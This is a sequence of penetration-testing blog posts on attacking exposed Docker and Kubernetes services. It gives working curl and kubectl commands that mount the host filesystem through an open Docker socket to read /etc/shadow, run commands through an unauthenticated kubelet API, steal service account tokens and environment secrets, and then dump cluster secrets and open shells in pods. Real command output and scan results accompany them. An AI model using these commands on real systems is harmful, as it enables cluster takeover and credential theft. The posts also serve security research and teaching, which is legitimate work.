"ID": "amxjs243dzmlc8vgukxdsx57y",
"Version": {
"Index": 6417
},
"CreatedAt": "2018-04-16T19:51:20.489851317Z",
"UpdatedAt": "2018-12-07T13:44:36.6869673Z",
"Spec": {
"Name": "app_REMOVED",
"Labels": {},
"TaskTemplate": {
"ContainerSpec": {
"Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",
"Env": [
"PGADMIN_DEFAULT_EMAIL=REMOVED@gmail.com",
"PGADMIN_DEFAULT_PASSWORD=REMOVED"
],
"Isolation": "default"

Creating a container that has mounted the host file system

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'

{"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test

Read something from the host

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'

{"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'

root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::
daemon:*:17001:0:99999:7:::
bin:*:17001:0:99999:7:::
sys:*:17001:0:99999:7:::
sync:*:17001:0:99999:7:::
games:*:17001:0:99999:7:::

Cleanup
Stop the container
curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop
delete stopped containers
curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

Tags: devoops
January 16, 2019
6:00
Kubernetes: Kube-Hunter 10255
» ‎ Carnal0wnage

Below is some sample output that mainly is here to see what open 10255 will give you and look like. What probably of most interest is the /pods endpoint

or the /metrics endpoint

or the /stats endpoint

$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning (scans one or more specific IPs or DNS names)
2. Subnet scanning (scans subnets on all local network interfaces)
3. IP range scanning (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
| type: open service
| service: Etcd
|_ host: 1.2.3.4:2379
|
| API Server:
| type: open service
| service: API Server
|_ host: 1.2.3.4:443
|
| API Server:
| type: open service
| service: API Server
|_ host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote version disclosure might give an
|_ attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Etcd is accessible using HTTP (without
| authorization and authentication), it would allow a
| potential attacker to
| gain access to
|_ the etcd
|
| Kubelet API (readonly):
| type: open service
| service: Kubelet API (readonly)
|_ host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote read access might expose to an
|_ attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| The kubernetes version could be obtained
|_ from logs in the /metrics endpoint
|
| Privileged Container:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| A Privileged container exist on a node.
| could expose the node/cluster to unwanted root
|_ operations
|
| Cluster Health Disclosure:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| By accessing the open /healthz handler, an
| attacker could get the cluster health state without
|_ authenticating
|
| Exposed Pods:
| type: vulnerability
| host: 1.2.3.4:10255
| description:
| An attacker could view sensitive information
| about pods that are bound to a Node using
|_ the /pods endpoint

----------

Nodes
+-------------+---------------+
| TYPE | LOCATION |
+-------------+---------------+
| Node/Master | 1.2.3.4 |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+----------------------+---------------------+----------------------+
| Kubelet API | 1.2.3.4:10255 | The read-only port |
| (readonly) | | on the kubelet |
| | | serves health |
| | | probing endpoints, |
| | | and is relied upon |
| | | by many kubernetes |
| | | componenets |
+----------------------+---------------------+----------------------+
| Etcd | 1.2.3.4:2379 | Etcd is a DB that |
| | | stores cluster's |
| | | data, it contains |
| | | configuration and |
| | | current state |
| | | information, and |
| | | might contain |
| | | secrets |
+----------------------+---------------------+----------------------+
| API Server | 1.2.3.4:6443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+----------------------+---------------------+----------------------+
| API Server | 1.2.3.4:443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible | Etcd is accessible | {"etcdserver":"2.3.8 |
| | Access | using insecure | using HTTP (without | ","etcdcluster":"2.3 |
| | | connection (HTTP) | authorization and | ... |
| | | | authentication), it | |
| | | | would allow a | |
| | | | potential attacker | |
| | | | to | |
| | | | gain access to | |
| | | | the etcd | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Information | Etcd Remote version | Remote version | {"etcdserver":"2.3.8 |
| | Disclosure | disclosure | disclosure might | ","etcdcluster":"2.3 |
| | | | give an attacker a | ... |
| | | | valuable data to | |
| | | | attack a cluster | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | K8s Version | The kubernetes | v1.5.6-rc17 |
| | Disclosure | Disclosure | version could be | |
| | | | obtained from logs | |
| | | | in the /metrics | |
| | | | endpoint | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | Exposed Pods | An attacker could | count: 68 |
| | Disclosure | | view sensitive | |
| | | | information about | |
| | | | pods that are bound | |
| | | | to a Node using the | |
| | | | /pods endpoint | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Information | Cluster Health | By accessing the | status: ok |
| | Disclosure | Disclosure | open /healthz | |
| | | | handler, an attacker | |
| | | | could get the | |
| | | | cluster health state | |
| | | | without | |
| | | | authenticating | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379 | Access Risk | Etcd Remote Read | Remote read access | {"action":"get","nod |
| | | Access Event | might expose to an | e":{"dir":true,"node |
| | | | attacker cluster's | ... |
| | | | possible exploits, | |
| | | | secrets and more. | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255 | Access Risk | Privileged Container | A Privileged | pod: node-exporter- |
| | | | container exist on a | 1fmd9-z9685, |
| | | | node. could expose | containe... |
| | | | the node/cluster to | |
| | | | unwanted root | |
| | | | operations | |
+---------------------+----------------------+----------------------+----------------------+----------------------+
Tags: cloud
6:00
Kubernetes: unauth kublet API 10250 token theft & kubectl
» ‎ Carnal0wnage

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec

kube-hunter output to get us started:

do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.

Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x 1 root root 4096 Nov 9 16:27 .
drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..
-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenv
drwxr-xr-x 2 root root 4096 Nov 9 16:27 bin
drwxr-xr-x 5 root root 380 Nov 9 16:27 dev
-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nanny
drwxr-xr-x 1 root root 4096 Nov 9 16:27 etc
drwxr-xr-x 2 root root 4096 Jan 9 2018 home
drwxr-xr-x 5 root root 4096 Nov 9 16:27 lib
drwxr-xr-x 5 root root 4096 Nov 9 16:27 media
drwxr-xr-x 2 root root 4096 Jan 9 2018 mnt
dr-xr-xr-x 134 root root 0 Nov 9 16:27 proc
drwx------ 2 root root 4096 Jan 9 2018 root
drwxr-xr-x 2 root root 4096 Jan 9 2018 run
drwxr-xr-x 2 root root 4096 Nov 9 16:27 sbin
drwxr-xr-x 2 root root 4096 Jan 9 2018 srv
dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys
drwxrwxrwt 1 root root 4096 Nov 9 17:00 tmp
drwxr-xr-x 7 root root 4096 Nov 9 16:27 usr
drwxr-xr-x 1 root root 4096 Nov 9 16:27 var

Check the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.

We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:
KUBERNETES_PORT=tcp://10.10.10.10:443
or
KUBERNETES_MASTER_NAME: 10.11.12.13:443
Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them. This may be (if we are lucky) another public IP or a 10. IP. If it's a 10. IP we need to download kubectl to the pod.
Assuming it's not in the environment variables let's look and see if they are there in the mounted secrets
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"
sample output truncated:cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
We can then cat out the ca.cert, namespace, and token
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"
Output:
total 4drwxrwxrwt 3 root root 140 Nov 9 16:27 .drwxr-xr-x 3 root root 4.0K Nov 9 16:27 ..lrwxrwxrwx 1 root root 13 Nov 9 16:27 ca.crt -> ..data/ca.crtlrwxrwxrwx 1 root root 16 Nov 9 16:27 namespace -> ..data/namespacelrwxrwxrwx 1 root root 12 Nov 9 16:27 token -> ..data/token
and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:

NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system event-exporter-v0.1.9-5c-SNIP 2/2 Running 2 120d
kube-system fluentd-cloud-logging-gke-eeme-api-default-pool 1/1 Running 1 2y
kube-system heapster-v1.5.2-5-SNIP 3/3 Running 0 27d
kube-system kube-dns-5b8-SNIP 4/4 Running 0 61d
kube-system kube-dns-autoscaler-2-SNIP 1/1 Running 1 252d
kube-system kube-proxy-gke-eeme-api-default-pool 1/1 Running 1 2y
kube-system kubernetes-dashboard-7-SNIP 1/1 Running 0 27d
kube-system l7-default-backend-10-SNIP 1/1 Running 0 27d
kube-system metrics-server-v0.2.1-7-SNIP 2/2 Running 0 120d

at this point you can pull secrets or exec into any available pods

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

to get a shell via kubectl

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system

NAME READY STATUS RESTARTS AGE
event-exporter-v0.1.9-5-SNIP 2/2 Running 2 120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f 2/2 Running 0 120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system--server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 .
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 ..
-rwxr-xr-x 1 root root 0 Sep 11 07:25 .dockerenv
drwxr-xr-x 3 root root 4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x 2 root root 12.0K Sep 11 07:24 bin
drwxr-xr-x 5 root root 380 Sep 11 07:25 dev
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 etc
drwxr-xr-x 2 nobody nogroup 4.0K Nov 1 2017 home
-rwxr-xr-x 2 root root 39.2M Dec 20 2017 metrics-server
dr-xr-xr-x 135 root root 0 Sep 11 07:25 proc
drwxr-xr-x 1 root root 4.0K Dec 19 21:33 root
dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys
drwxrwxrwt 1 root root 4.0K Oct 18 13:57 tmp
drwxr-xr-x 3 root root 4.0K Sep 11 07:24 usr
drwxr-xr-x 1 root root 4.0K Sep 11 07:25 var

For completeness if you got the keys via the environment variables the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces

Tags: cloud
6:00
Kubernetes: unauth kublet API 10250 basic code exec
» ‎ Carnal0wnage

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.

Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
# /run/%namespace%/%pod_name%/%container_name%
example:
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"
total 12drwxr-xr-x 13 root root 148 Aug 26 11:31 .drwxr-xr-x 13 root root 148 Aug 26 11:31 ..-rwxr-xr-x 1 root root 0 Aug 26 11:31 .dockerenvdrwxr-xr-x 2 root root 8192 May 5 22:22 bindrwxr-xr-x 5 root root 380 Aug 26 11:31 devdrwxr-xr-x 3 root root 135 Aug 26 11:31 etcdrwxr-xr-x 2 nobody nogroup 6 Mar 18 16:38 homedrwxr-xr-x 2 root root 6 Apr 23 11:17 libdr-xr-xr-x 353 root root 0 Aug 26 07:14 procdrwxr-xr-x 2 root root 6 Mar 18 16:38 rootdr-xr-xr-x 13 root root 0 Aug 26 15:12 sysdrwxrwxrwt 2 root root 6 Mar 18 16:38 tmpdrwxr-xr-x 4 root root 31 Apr 23 11:17 usrdrwxr-xr-x 5 root root 41 Aug 26 11:31 var

Here is how to get all secrets which container uses (environment variables - commons to see kublet tokens here):
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system//" -d "cmd=env"
The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:
$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool
or
$ curl --insecure https://k8s-node-1:10250/runningpods | jq

Example 1:
curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)
Example 2:curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Unauthorized
Example 3:
curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:
{ "kind": "PodList", "apiVersion": "v1", "metadata": {}, "items": [ { "metadata": { "name": "kube-dns-5b8bf6c4f4-k5n2g", "generateName": "kube-dns-5b8bf6c4f4-", "namespace": "kube-system", "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g", "uid": "63438841-e43c-11e8-a104-42010a80038e", "resourceVersion": "85366060", "creationTimestamp": "2018-11-09T16:27:44Z", "labels": { "k8s-app": "kube-dns", "pod-template-hash": "1646927090" }, "annotations": { "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z", "kubernetes.io/config.source": "api", "scheduler.alpha.kubernetes.io/critical-pod": "" }, "ownerReferences": [ { "apiVersion": "extensions/v1beta1", "kind": "ReplicaSet", "name": "kube-dns-5b8bf6c4f4", "uid": "633db9d4-e43c-11e8-a104-42010a80038e", "controller": true } ] }, "spec": { "volumes": [ { "name": "kube-dns-config", "configMap": { "name": "kube-dns", "defaultMode": 420 } }, { "name": "kube-dns-token-xznw5", "secret": { "secretName": "kube-dns-token-xznw5", "defaultMode": 420 } } ], "containers": [ { "name": "dnsmasq", "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10", "args": [ "-v=2", "-logtostderr", "-configDir=/etc/k8s/dns/dnsmasq-nanny", "-restartDnsmasq=true", "--", "-k", "--cache-size=1000", "--no-negcache", "--log-facility=-", "--server=/cluster.local/127.0.0.1#10053", "--server=/in-addr.arpa/127.0.0.1#10053", "--server=/ip6.arpa/127.0.0.1#10053" ], "ports": [ { "name": "dns", "containerPort": 53, "protocol": "UDP" }, { "name": "dns-tcp", "containerPort": 53, "protocol": "TCP" } ], "resources": { "requests": { "cpu": "150m", "memory": "20Mi" } }, "volumeMounts": [ { "name": "kube-dns-config", "mountPath": "/etc/k8s/dns/dnsmasq-nanny" }, { "name": "kube-dns-token-xznw5", "readOnly": true, "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount" } ], "livenessProbe": { "httpGet": { "path": "/healthcheck/dnsmasq", "port": 10054, "scheme": "HTTP" }, "initialDelaySeconds": 60, "timeoutSeconds": 5, "periodSeconds": 10, "successThreshold": 1, "failureThreshold": 5 }, "terminationMessagePath": "/dev/termination-log", "imagePullPolicy": "IfNotPresent" }, --------SNIP---------
With the output of the running pods command you can craft your command to do the code exec
$ curl -k -XPOST "https://k8s-node-1:10250/run///" -d "cmd=env"
as an example:

leaves you with:
curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"
total 35264drwxr-xr-x 1 root root 4096 Nov 9 16:27 .drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenvdrwxr-xr-x 2 root root 4096 Nov 9 16:27 bindrwxr-xr-x 5 root root 380 Nov 9 16:27 dev-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nannydrwxr-xr-x 1 root root 4096 Nov 9 16:27 etcdrwxr-xr-x 2 root root 4096 Jan 9 2018 homedrwxr-xr-x 5 root root 4096 Nov 9 16:27 libdrwxr-xr-x 5 root root 4096 Nov 9 16:27 mediadrwxr-xr-x 2 root root 4096 Jan 9 2018 mntdr-xr-xr-x 125 root root 0 Nov 9 16:27 procdrwx------ 2 root root 4096 Jan 9 2018 rootdrwxr-xr-x 2 root root 4096 Jan 9 2018 rundrwxr-xr-x 2 root root 4096 Nov 9 16:27 sbindrwxr-xr-x 2 root root 4096 Jan 9 2018 srvdr-xr-xr-x 12 root root 0 Nov 9 16:27 sysdrwxrwxrwt 1 root root 4096 Nov 9 17:00 tmpdrwxr-xr-x 7 root root 4096 Nov 9 16:27 usrdrwxr-xr-x 1 root root 4096 Nov 9 16:27 var
Tags: cloud
January 14, 2019
13:31
Kubernetes: List of ports
» ‎ Carnal0wnage
Other Kubernetes ports

What are some of the visible ports used in Kubernetes?
- 44134/tcp - Helmtiller, weave, calico
- 10250/tcp - kubelet (kublet exploit)
- 10255/tcp - kublet port (read-only)
- 4194/tcp - cAdvisor
- 2379/tcp - etcd (see it on other ports though)
- 30000 - dashboard
- 443/6443 - api
Tags: cloud
January 11, 2019
6:00
Kubernetes: Kubernetes Dashboard
» ‎ Carnal0wnage

Tesla was famously hacked for leaving this open and it's pretty rare to find it exposed externally now but useful to know what it is and what you can do with it.

Usually found on port 30000

kube-hunter finding for it:

Vulnerabilities
+-----------------------+---------------+----------------------+----------------------+------------------+
| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+-----------------------+---------------+----------------------+----------------------+------------------+
| 1.2.3.4:30000 | Remote Code | Dashboard Exposed | All oprations on the | nodes: pach-okta |
| | Execution | | cluster are exposed | |
+-----------------------+---------------+----------------------+----------------------+------------------+

Why do you care? It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.

Screenshots of what it looks like:
viewing secrets

utilization

logs
shells

Tags: cloud
6:00
Kubernetes: Kubelet API containerLogs endpoint
» ‎ Carnal0wnage
How to get the info that kube-hunter reports for open /containerLogs endpoint

Vulnerabilities
+---------------+-------------+------------------+----------------------+----------------+
| LOCATION CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+---------------+-------------+------------------+----------------------+----------------+
+----------------+------------+------------------+----------------------+----------------+
| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a | |
| | Disclosure | Logs | running container | |
| | | | are using the | |
| | | | exposed | |
| | | | /containerLogs | |
| | | | endpoint | |
+---------------+-------------+------------------+----------------------+----------------+

First step, grab the output from /runningpods/ example below:

You'll need the namespace, pod name and container name.

Thus given the below runningpods output:
```
{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},
```
```
turns into:
```
```
https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana
```
```
and
```
```
https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb
```
Tags: cloud
January 07, 2019
6:00
Kubernetes: Master Post
» ‎ Carnal0wnage

I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If i'm missing blog posts or useful resources ping me here or twitter.

Talks you should watch if you are interested in Kubernetes:

Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesamanhttps://www.youtube.com/watch?v=vTgQLzeBfRU
https://github.com/bgeesaman/
https://github.com/bgeesaman/hhkbe [demos for the talk above]
https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf [slide deck]

Perfect Storm Taking the Helm of Kubernetes Ian Coldwaterhttps://www.youtube.com/watch?v=1k-GIDXgfLw

A Hacker's Guide to Kubernetes and the Cloud - Rory McCunehttps://www.youtube.com/watch?v=dxKpCO2dAy8Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kuberneteshttps://www.youtube.com/watch?v=ohTq0no0ZVU

Blog posts by others:

https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://www.4armed.com/blog/hacking-digitalocean-kubernetes/
https://github.com/freach/kubernetes-security-best-practice
https://neuvector.com/container-security/kubernetes-security-guide/
https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066
https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/
https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/
https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/
https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Auditing tools

https://github.com/Shopify/kubeaudit
https://github.com/aquasecurity/kube-bench
https://github.com/aquasecurity/kube-hunter

CVE-2018-1002105 resources

https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb
https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/
https://github.com/gravitational/cve-2018-1002105
https://github.com/evict/poc_CVE-2018-1002105

CG Posts:

Open Etcd: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
Etcd with kube-hunter: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html
cAdvisor: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html

Kubernetes ports: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html
Kubernetes dashboards: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html
Kublet 10255: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
Kublet 10250
- Container Logs: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html
- Getting shellz 1: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
- Getting shellz 2: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html

Cloud Metadata Urls and Kubernetes

-I'll update as they get posted

Tags: cloud
January 06, 2019
6:00
Kubernetes: cAdvisor
» ‎ Carnal0wnage

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

runs on port 4194

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

information disclosure about metrics of the containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true

Screenshots

Tags: cloud
6:00
Kubernetes: open etcd
» ‎ Carnal0wnage

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html

What this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords. If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.

refs:
https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

the second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

Example Loot -

Usually it's boring stuff like this:

But occasionally you'll get more interesting things like:

or more fun things like kublet tokens:

Tags: cloud
6:00
Kubernetes: kube-hunter.py etcd
» ‎ Carnal0wnage

I mentioned in the master post one a few auditing tools that exist. Kube-Hunter is one that is pretty ok. You can use this to quickly scan for multiple kubernetes issues.

Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning (scans one or more specific IPs or DNS names)
2. Subnet scanning (scans subnets on all local network interfaces)
3. IP range scanning (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
| type: open service
| service: Etcd
|_ host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote version disclosure might give an
|_ attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Etcd is accessible using HTTP (without
| authorization and authentication), it would allow a
| potential attacker to
| gain access to
|_ the etcd
|
| Etcd Remote Read Access Event:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote read access might expose to an
|_ attacker cluster's possible exploits, secrets and more.

----------

Nodes
+-------------+----------------+
| TYPE | LOCATION |
+-------------+----------------+
| Node/Master | 1.2.3.4 |
+-------------+----------------+

Detected Services
+---------+---------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+---------+---------------------+----------------------+
| Etcd | 1.2.3.4:2379 | Etcd is a DB that |
| | | stores cluster's |
| | | data, it contains |
| | | configuration and |
| | | current state |
| | | information, and |
| | | might contain |
| | | secrets |
+---------+---------------------+----------------------+

Vulnerabilities
